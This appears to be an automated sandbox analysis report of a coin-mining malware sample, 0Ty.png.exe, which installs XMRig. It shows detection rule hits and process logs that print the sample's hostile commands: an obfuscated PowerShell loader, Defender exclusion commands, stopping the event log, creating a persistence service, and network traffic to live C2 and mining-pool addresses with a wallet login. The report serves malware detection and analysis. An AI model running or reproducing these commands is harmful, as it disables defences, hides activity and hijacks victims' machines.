Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
Source | Rule | Description | Author | Strings
00000041.00000002.2939799608.000002F62B721000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000041.00000002.2939799608.000002F62B6C9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000041.00000002.2936453016.0000000140001000.00000040.00000001.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000041.00000002.2936453016.0000000140001000.00000040.00000001.00020000.00000000.sdmp | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
          • 0x36fc08:$a1: mining.set_target
          • 0x361e30:$a2: XMRIG_HOSTNAME
          • 0x3647a8:$a3: Usage: xmrig [OPTIONS]
          • 0x361e08:$a4: XMRIG_VERSION
Source | Rule | Description | Author | Strings
65.2.dialer.exe.140000000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
65.2.dialer.exe.140000000.0.unpack | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
            • 0x370008:$a1: mining.set_target
            • 0x362230:$a2: XMRIG_HOSTNAME
            • 0x364ba8:$a3: Usage: xmrig [OPTIONS]
            • 0x362208:$a4: XMRIG_VERSION
65.2.dialer.exe.140000000.0.unpack | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth
            • 0x3b5761:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
65.2.dialer.exe.140000000.0.unpack | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen
            • 0x3b5fd8:$s1: %s/%s (Windows NT %lu.%lu
            • 0x3b9600:$s3: \\.\WinRing0_
            • 0x3671a8:$s4: pool_wallet
            • 0x3615d8:$s5: cryptonight
            • 0x3615e8:$s5: cryptonight
            • 0x3615f8:$s5: cryptonight
            • 0x361608:$s5: cryptonight
            • 0x361620:$s5: cryptonight
            • 0x361630:$s5: cryptonight
            • 0x361640:$s5: cryptonight
            • 0x361658:$s5: cryptonight
            • 0x361668:$s5: cryptonight
            • 0x361680:$s5: cryptonight
            • 0x361698:$s5: cryptonight
            • 0x3616a8:$s5: cryptonight
            • 0x3616b8:$s5: cryptonight
            • 0x3616c8:$s5: cryptonight
            • 0x3616e0:$s5: cryptonight
            • 0x3616f8:$s5: cryptonight
            • 0x361708:$s5: cryptonight
            • 0x361718:$s5: cryptonight

            Change of critical system settings

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\0Ty.png.exe", ParentImage: C:\Users\user\Desktop\0Ty.png.exe, ParentProcessId: 7416, ParentProcessName: 0Ty.png.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7952, ProcessName: powercfg.exe

            System Summary

            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CKtjhrwjgtVV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OBERloAcZJvOcu,[Parameter(Position=1)][Type]$NRdDEuXiTK)$iAHAMhduySN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+'mor'+[Char](121)+''+[Char](77)+''+'o'+'dul'+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+''+'y'+'p'+'e'+'',''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c,'+[Char](83)+'e'+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'nsiC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+'Cla'+'s'+''+'s'+'',[MulticastDelegate]);$iAHAMhduySN.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OBERloAcZJvOcu).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ged');$iAHAMhduySN.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+'ub'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char]
(66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+[Char](108)+'',$NRdDEuXiTK,$OBERloAcZJvOcu).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+','+''+[Char](77)+'anag'+'e'+''+'d'+'');Write-Output $iAHAMhduySN.CreateType();}$qragMIYqXnsdW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+'te'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'os'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+''+'i'+'n3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+'s'+[Char](97)+'f'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+'ho'+[Char](100)+''+'s'+'');$OvDFGAtJneNnnn=$qragMIYqXnsdW.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+[Char](10
            Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CKtjhrwjgtVV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OBERloAcZJvOcu,[Parameter(Position=1)][Type]$NRdDEuXiTK)$iAHAMhduySN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+'mor'+[Char](121)+''+[Char](77)+''+'o'+'dul'+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+''+'y'+'p'+'e'+'',''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c,'+[Char](83)+'e'+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'nsiC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+'Cla'+'s'+''+'s'+'',[MulticastDelegate]);$iAHAMhduySN.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OBERloAcZJvOcu).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ged');$iAHAMhduySN.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+'ub'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+[Char](108)+'',$NRdDEuXiTK,$OBERloAcZJvOcu).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+','+''+[Char](77)+'anag'+'e'+''+'d'+'');Write-Output $iAHAMhduySN.CreateType();}$qragMIYqXnsdW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+'te'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'os'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+''+'i'+'n3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+'s'+[Char](97)+'f'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+'ho'+[Char](100)+''+'s'+'');$OvDFGAtJneNnnn=$qragMIYqXnsdW.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+[Char](10
            Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\0Ty.png.exe", ParentImage: C:\Users\user\Desktop\0Ty.png.exe, ParentProcessId: 7416, ParentProcessName: 0Ty.png.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7428, ProcessName: powershell.exe
            Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{cf3d95db-0758-4a82-bfdc-72f769e75e83}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 8008, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
            Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: C:\Windows\system32\sc.exe create "HGLZSDMZ" binpath= "C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "HGLZSDMZ" binpath= "C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\0Ty.png.exe", ParentImage: C:\Users\user\Desktop\0Ty.png.exe, ParentProcessId: 7416, ParentProcessName: 0Ty.png.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "HGLZSDMZ" binpath= "C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe" start= "auto", ProcessId: 8176, ProcessName: sc.exe
            Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\0Ty.png.exe", ParentImage: C:\Users\user\Desktop\0Ty.png.exe, ParentProcessId: 7416, ParentProcessName: 0Ty.png.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7428, ProcessName: powershell.exe

            HIPS / PFW / Operating System Protection Evasion

            Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\0Ty.png.exe", ParentImage: C:\Users\user\Desktop\0Ty.png.exe, ParentProcessId: 7416, ParentProcessName: 0Ty.png.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 3704, ProcessName: sc.exe
            Timestamp                         SID      Severity  Classtype                                 Source IP    Source Port  Destination IP   Destination Port  Protocol
            2024-12-25T17:23:07.931161+0100   2044697  1         A Network Trojan was detected             192.168.2.4  49731        85.209.133.29    80                TCP
            2024-12-25T17:24:06.527059+0100   2051004  2         Crypto Currency Mining Activity Detected  192.168.2.4  49755        85.209.133.29    80                TCP
            2024-12-25T17:25:06.831505+0100   2051004  2         Crypto Currency Mining Activity Detected  192.168.2.4  49775        85.209.133.29    80                TCP
            2024-12-25T17:23:00.307417+0100   2826930  2         Crypto Currency Mining Activity Detected  192.168.2.4  49730        194.164.234.171  10128             TCP


            AV Detection

            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | ReversingLabs: Detection: 65%
            Source: 0Ty.png.exe | Virustotal: Detection: 65%
            Source: 0Ty.png.exe | ReversingLabs: Detection: 65%
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Windows\System32\dialer.exe | Code function: 24_2_0000000140001000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,24_2_0000000140001000
            Source: C:\Windows\System32\dialer.exe | Code function: 62_2_0000000140001000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,62_2_0000000140001000

            Bitcoin Miner

            Source: Yara match | File source: dump.pcap, type: PCAP
            Source: Yara match | File source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000041.00000002.2939799608.000002F62B721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000041.00000002.2939799608.000002F62B6C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000041.00000002.2936453016.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
            Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 194.164.234.171:10128 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"47fxvmqwe3icaroaa2otudltu9sjascu5xpzwpd9clqhswjmnjwpbojh6ffsyasrgfq9kuv7nqp2sisa3c4kwuggfshb9to","pass":"","agent":"xmrig/6.21.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
            Source: dialer.exe | String found in binary or memory: cryptonight/0
            Source: 0Ty.png.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
            Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
            Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
            Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
            Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
            Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
            Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
            Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
            Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
            Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
            Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
            Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
            Source: C:\Windows\System32\conhost.exeCode function: 31_2_000002408A29E110 FindFirstFileExW,31_2_000002408A29E110
            Source: C:\Windows\System32\conhost.exeCode function: 67_2_0000014ECB4AE110 FindFirstFileExW,67_2_0000014ECB4AE110
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC64E110 FindFirstFileExW,69_2_00000225DC64E110
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC67E110 FindFirstFileExW,69_2_00000225DC67E110
            Source: C:\Windows\System32\lsass.exeCode function: 70_2_00000202C0AEE110 FindFirstFileExW,70_2_00000202C0AEE110
            Source: C:\Windows\System32\svchost.exeCode function: 71_2_000002A66130E110 FindFirstFileExW,71_2_000002A66130E110
            Source: C:\Windows\System32\dwm.exeCode function: 72_2_000002BAAEE0E110 FindFirstFileExW,72_2_000002BAAEE0E110
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_000002488060E110 FindFirstFileExW,73_2_000002488060E110

            Networking

            Source: Network traffic | Suricata IDS: 2044697 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 : 192.168.2.4:49731 -> 85.209.133.29:80
            Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 194.164.234.171:10128
            Source: Joe Sandbox View | ASN Name: CMCSUS CMCSUS
            Source: Network traffic | Suricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.4:49775 -> 85.209.133.29:80
            Source: Network traffic | Suricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.4:49755 -> 85.209.133.29:80
            Source: Network traffic | Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49730 -> 194.164.234.171:10128
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | TCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | DNS traffic detected: DNS query: gulf.moneroocean.stream
            Source: unknown | HTTP traffic detected: POST /lowkey/api/endpoint.php HTTP/1.1 Accept: */* Connection: close Content-Length: 283 Content-Type: application/json Host: 85.209.133.29 User-Agent: cpp-httplib/0.12.6
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found content-length: 14 date: Wed, 25 Dec 2024 16:23:07 GMT Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: File not found
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found content-length: 14 date: Wed, 25 Dec 2024 16:24:06 GMT Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: File not found
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found content-length: 14 date: Wed, 25 Dec 2024 16:25:06 GMT Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: File not found
            Source: powershell.exe, 0000001C.00000002.1836172170.000001BF90219000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1836172170.000001BF90074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000001C.00000002.1767100204.000001BF8022C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: dialer.exe, 00000018.00000003.1719273538.0000027DD0413000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000018.00000002.1719637666.0000027DD0417000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.m
            Source: powershell.exe, 0000001C.00000002.1767100204.000001BF80001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 0000001C.00000002.1767100204.000001BF8022C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 0000001C.00000002.1767100204.000001BF80001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 0000001C.00000002.1836172170.000001BF90074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000001C.00000002.1836172170.000001BF90074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000001C.00000002.1836172170.000001BF90074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000001C.00000002.1767100204.000001BF8022C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 0000001C.00000002.1767100204.000001BF81151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
            Source: powershell.exe, 0000001C.00000002.1836172170.000001BF90074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

            System Summary

            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
            Source: 00000041.00000002.2936453016.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8B0FE4 NtResumeThread,28_2_00007FFD9B8B0FE4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8ADF98 NtUnmapViewOfSection,28_2_00007FFD9B8ADF98
